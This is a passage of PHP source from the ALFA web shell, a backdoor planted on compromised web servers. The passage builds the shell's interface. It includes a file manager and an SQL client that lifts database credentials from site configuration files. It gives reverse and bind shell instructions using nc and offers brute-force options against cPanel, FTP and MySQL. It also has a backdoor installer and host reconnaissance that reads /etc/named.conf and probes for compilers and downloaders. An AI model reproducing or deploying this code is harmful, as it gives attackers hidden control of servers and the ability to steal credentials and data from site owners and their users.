6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.foottable{width: 300px;font-weight: bold;' . (!@is_writable($GLOBALS['cwd']) ? '}.dir{background-color:red;}' : '}') . '.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }' . alfaCssLoadColors() . '</style>';
1155. echo "<script type='text/javascript'>var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';var a_ = '" . htmlspecialchars(@$_POST['a']) . "';var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';var alfa1_ = '" . ((strpos(@$_POST['alfa1'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa1'], ENT_QUOTES)) . "';var alfa2_ = '" . ((strpos(@$_POST['alfa2'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa2'], ENT_QUOTES)) . "';var alfa3_ = '" . ((strpos(@$_POST['alfa3'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa3'], ENT_QUOTES)) . "';var alfa4_ = '" . ((strpos(@$_POST['alfa4'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa4'], ENT_QUOTES)) . "';var alfa5_ = '" . ((strpos(@$_POST['alfa5'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa5'], ENT_QUOTES)) . "';var alfa6_ = '" . ((strpos(@$_POST['alfa6'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa6'], ENT_QUOTES)) . "';var alfa7_ = '" . ((strpos(@$_POST['alfa7'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa7'], ENT_QUOTES)) . "';var alfa8_ = '" . ((strpos(@$_POST['alfa8'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa8'], ENT_QUOTES)) . "';var alfa9_ = '" . ((strpos(@$_POST['alfa9'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa9'], ENT_QUOTES)) . "';var alfa10_ = '" . ((strpos(@$_POST['alfa10'], "\n") !== false) ? '' : htmlspecialchars($_POST['alfa10'], ENT_QUOTES)) . "';var d = document;var mysql_cache = {};var editor_files = {};var editor_error = true;var editor_current_file = '';var is_minimized = false;var cgi_is_minimized = false;var cgi_lang = '';var upcount = 1;var islinux = " . ($GLOBALS['sys'] != "win" ? 'true' : 'false') . ";var post_encryption_mode = " . (__ALFA_POST_ENCRYPTION__ ? 'true' : 'false') . ";function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
1156. for ($j = 1;$j <= 10;$j++)
1157. {
1158. echo 'if(alfa' . $j . '!=null)d.mf.alfa' . $j . '.value=alfa' . $j . ';else d.mf.alfa' . $j . '.value=alfa' . $j . '_;';
1159. }
1160. echo "if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;}";
1161. echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="' . __showicon('loader') . '"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function setCookie(e,i,t){var l=new Date;l.setTime(l.getTime()+24*t*60*60*1e3);var o="expires="+l.toUTCString();document.cookie=e+"="+i+";"+o+";path=/"}function getCookie(e){var i=("; "+document.cookie).split("; "+e+"=");if(2==i.length)return i.pop().split(";").shift()}function editorClose(e){d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e?is_minimized=!1:cgi_is_minimized=!1,setTimeout(function(){elem.removeAttribute("class"),elem.style.display="none"},1e3),d.body.style.overflow="visible"}function showEditor(e){$(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e?(is_minimized=!1,cgi_is_minimized&&($("cgiloader-minimized").style.top="30%")):(cgi_is_minimized=!1,is_minimized&&($("editor-minimized").style.top="30%")),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?(is_minimized=!0,cgi_is_minimized?($("cgiloader-minimized").style.top="20%",$("editor-minimized").style.top="50%"):$("editor-minimized").style.top="30%"):(cgi_is_minimized=!0,is_minimized?($("cgiloader-minimized").style.top="20%",$("editor-minimized").style.top="50%"):$("cgiloader-minimized").style.top="30%"),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function editor(e,i,t,l,o,a){if("dir"==a&&".."==e)return!1;if("download"==i)return g("FilesTools",l,e,"download"),!1;var r="",n="",s="",f=d.mf.c.value,c=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var m=getCookie("alfa_history_files");try{editor_files=JSON.parse(m);for(var u in editor_files)insertToHistory(u,editor_files[u].file,0,editor_files[u].type)}catch(e){}}if(-1!=e.indexOf("/")){var p=e.split("/");e=p[p.length-1],delete p[p.length-1],f=p.join("/"),islinux&&(f="/"+f)}void 0===a&&(a=""),void 0!==l&&null!=l&&0!=l.length&&(f=l.trim());try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){c=!1,o=v;break}}catch(e){console.log(e)}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==o&&null!=o&&0!=o.length)n=alfab64(o),s=o;else{var _="file_"+getRandom(10);n=alfab64(_),s=_}return alfaloader("block"),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(i)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t){if(document.querySelector(".editor-content").innerHTML=t,$("editor").style.display="block",alfaloader("none"),evalJS(t),"delete"!=i&&editor_error){var l=d.getElementsByClassName("is_active");0!=l.length&&(l[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&c?(editor_files[n]={file:e,pwd:f,type:a},insertToHistory(n,e," is_active",a),"mkfile"==i&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,is_minimized&&showEditor("editor"),updateCookieEditor()}),!1}function insertToHistory(e,i,t,l){var o="";t&&0!=t&&(o=t);var a=document.createElement("div");a.innerHTML="<div id=\'"+e+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(i,l,e)+"</div><div class=\'editor-file-name\'>"+i+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+e+"\");\'>X</div>",a.className="file-holder"+o,a.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),a.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(a,r.firstChild)}function loadType(e,i,t){"none"==i&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class=\'editor-icon\'>"+loadType(editor_files[t].file,e,t)+"</div><div class=\'editor-file-name\'>"+editor_files[t].file+"</div>",editor_files[t].type=e});return"file"==i?(i=(i=e.split("."))[i.length-1].toLowerCase(),-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(i)&&(i="notfound")):i="folder",\'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\'.replace("{type}",i+".png")}function updateDirsEditor(e,i){var t=d.mf.c.value+"/",l=editor_files[e].pwd+"/"+i+"/",o=editor_files[e].pwd+"/"+editor_files[e].file+"/";l=l.replace(/\/\//g,"/"),o=o.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(l)&&(initDir(t.replace(l,o)),d.mf.c.value=t.replace(l,o),_Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)}));for(var a in editor_files){var r=editor_files[a].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(l)&&(editor_files[a].pwd=r.replace(l,o))}var n=new RegExp("\'"+l.slice(0,-1)+"\'"),s=new RegExp(i+" \\\|</b></a>");d.files.innerHTML=d.files.innerHTML.replace(n,"\'"+o.slice(0,-1)+"\'"),d.files.innerHTML=d.files.innerHTML.replace(s,editor_files[e].file+" |</b></a>"),updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",JSON.stringify(editor_files),2012)}function setEditorTitle(e,i){"out"==i&&""!=editor_current_file&&(e=editor_current_file),editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var i=d.getElementsByClassName("filestools")[0];i&&i.getAttribute("fid")==e&&(i.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var i="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",l=void 0===e?20:e;l>0;--l)i+=t[Math.floor(Math.random()*t.length)];return i}function reopen(e){var i=e.getAttribute("id"),t=editor_files[i].pwd;editor(editor_files[i].file,"auto","",t,i)}function copyToClipboard(e){document.getElementById(e);if(document.selection)(i=document.body.createTextRange()).moveToElementText(document.getElementById(e)),i.select(),document.execCommand("Copy"),alert("text copied");else if(window.getSelection()){var i=document.createRange();i.selectNode(document.getElementById(e)),window.getSelection().removeAllRanges(),window.getSelection().addRange(i),document.execCommand("copy"),alert("text copied")}}function encrypt(e,i){if(null==i||i.length<=0)return null;e=alfab64(e,!0),i=alfab64(i,!0);for(var t="",l="",o=0;o<e.length;)for(var a=0;a<i.length&&(t=e.charCodeAt(o)^i.charCodeAt(a),l+=String.fromCharCode(t),!(++o>=e.length));a++);return alfab64(l,!0)}function reloadSetting(e){return alfaloader("block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e),alfaloader("none")},!0),0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var i={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");i[t]=e.value}):i=e,alfaloader("block");var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(i))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none"),evalJS(e)},!0)}function alfab64(e,i){return void 0!==i||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"' . _AlfaSecretKey() . '")}function evalCss(e){var i=document.createElement("style");i.styleSheet?i.styleSheet.cssText=e:i.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(i)}function colorHandlerKey(e){setTimeout(function(i){colorHandler(e)},200)}function colorHandler(e){var t=e.getAttribute("target"),l=e.getAttribute("multi"),o=t.indexOf(":hover");if(l){var a=JSON.parse(atob(l)),r="";for(i in a.multi_selector)r+=i+"{"+a.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==o||l?($("input_"+t.replace(".","")).value=e.value,$("gui_"+t.replace(".","")).value=e.value,".header_values"==t&&(t=".header,.header_values"),d.querySelectorAll(t).forEach(function(i){i.style.color=e.value})):($("input_"+t.replace(".","")).value=e.value,$("gui_"+t.replace(".","")).value=e.value,evalCss(t+"{color: "+e.value+";}"))}function importConfig(e){var i=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(i.files[0])}function checkBox(){for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&(d.files.elements[i].checked=d.files.elements[0].checked)}function path_history(e){_Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan",e)},!0)}function runcgi(e){if(cgi_is_minimized&&cgi_lang==e)return showEditor("cgiloader"),!1;_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(i){d.body.style.overflow="hidden",$("cgiloader").style.display="block",$("cgiframe").innerHTML=i,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}';
1162. echo "</script><form style='display:none;' id='dlForm' action='' target='_blank' method='post'><input type='hidden' name='a' value='dlfile'><input type='hidden' name='c' value=''><input type='hidden' name='file' value=''></form><input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'><img id='a_loader' src='" . __showicon('loader') . "'>";
1163. $cmd_uname = alfaEx("uname -a", false, false);
1164. $uname = function_exists('php_uname') ? substr(@php_uname() , 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
1165. if ($uname == "( php_uname ) Function Disabled !")
1166. {
1167. $GLOBALS["need_to_update_header"] = "true";
1168. }
1169. echo '</head><body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><div id="up_bar"></div><div class="whole"><form method="post" name="mf" style="display:none;"><input type="hidden" name="a"><input type="hidden" name="c" value="' . $GLOBALS['cwd'] . '">';
1170. for ($s = 1;$s <= 10;$s++)
1171. {
1172. echo '<input type="hidden" name="alfa' . $s . '">';
1173. }
1174. echo '<input type="hidden" name="charset"></form><div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">' . __ALFA_VERSION__ . '</span></small></a></div><div class="header"><table width="100%" border="0"><tr><td width="3%"><span class="header_vars">Uname:</span></td><td colspan="2"><span class="header_values" id="header_uname">' . $uname . '</span></td></tr><tr><td><span class="header_vars">User:</span></td><td><span class="header_values" id="header_userid">' . $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td><td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td></tr><tr><td><span class="header_vars">PHP:</span></td><td><b>' . @phpversion() . ' </b><span class="header_vars"> Safe Mode: ' . $safe_modes . '</span></td></tr><tr><td><span class="header_vars">ServerIP:</span></td><td><b>' . (!@$_SERVER["SERVER_ADDR"] ? (function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????') : @$_SERVER["SERVER_ADDR"]) . ' <span class="header_vars">Your IP:</span><b> ' . @$_SERVER["REMOTE_ADDR"] . '</b></td></tr><tr><td width="3%"><span class="header_vars">DateTime:</span></td><td colspan="2"><b>' . date('Y-m-d H:i:s') . '</b></td></tr><tr><td><span class="header_vars">Domains:</span></td><td width="76%"><span class="header_values" id="header_domains">';
1175. if ($GLOBALS['sys'] == 'unix')
1176. {
1177. $d0mains = _alfa_file("/etc/named.conf", false);
1178. if (!$d0mains)
1179. {
1180. echo "Cant Read [ /etc/named.conf ]";
1181. $GLOBALS["need_to_update_header"] = "true";
1182. }
1183. else
1184. {
1185. $count = 0;
1186. foreach ($d0mains as $d0main)
1187. {
1188. if (@strstr($d0main, "zone"))
1189. {
1190. preg_match_all('#zone "(.*)"#', $d0main, $domains);
1191. flush();
1192. if (strlen(trim($domains[1][0])) > 2)
1193. {
1194. flush();
1195. $count++;
1196. }
1197. }
1198. }
1199. echo "$count Domains";
1200. }
1201. }
1202. else
1203. {
1204. echo ("Cant Read [ /etc/named.conf ]");
1205. }
1206. echo '</span></td></tr><tr><td height="16"><span class="header_vars">HDD:</span></td><td><span class="header_vars">Total:</span><b>' . alfaSize($totalSpace) . ' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' [' . (int)($freeSpace / $totalSpace * 100) . '%]</b></td></tr>';
1207. if ($GLOBALS['sys'] == 'unix')
1208. {
1209. $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
1210. if (!@ini_get('safe_mode'))
1211. {
1212. if (strlen(alfaEx("id", false, false)) > 0)
1213. {
1214. echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
1215. $userful = array(
1216. 'gcc',
1217. 'lcc',
1218. 'cc',
1219. 'ld',
1220. 'make',
1221. 'php',
1222. 'perl',
1223. 'python',
1224. 'ruby',
1225. 'tar',
1226. 'gzip',
1227. 'bzip',
1228. 'bzialfa2',
1229. 'nc',
1230. 'locate',
1231. 'suidperl'
1232. );
1233. $x = 0;
1234. foreach ($userful as $item) if (alfaWhich($item))
1235. {
1236. $x++;
1237. echo '<span class="header_values" style="margin-left: 4px;">' . $item . '</span>';
1238. }
1239. if ($x == 0)
1240. {
1241. echo "<span class='header_values' id='header_useful'>--------------</span>";
1242. $GLOBALS["need_to_update_header"] = "true";
1243. }
1244. echo '</td></tr><tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
1245. $downloaders = array(
1246. 'wget',
1247. 'fetch',
1248. 'lynx',
1249. 'links',
1250. 'curl',
1251. 'get',
1252. 'lwp-mirror'
1253. );
1254. $x = 0;
1255. foreach ($downloaders as $item2) if (alfaWhich($item2))
1256. {
1257. $x++;
1258. echo '<span class="header_values" style="margin-left: 4px;">' . $item2 . '</span>';
1259. }
1260. if ($x == 0)
1261. {
1262. echo "<span class='header_values' id='header_downloader'>--------------</span>";
1263. $GLOBALS["need_to_update_header"] = "true";
1264. }
1265. echo '</td></tr>';
1266. }
1267. else
1268. {
1269. echo $useful_downloader;
1270. $GLOBALS["need_to_update_header"] = "true";
1271. }
1272. }
1273. else
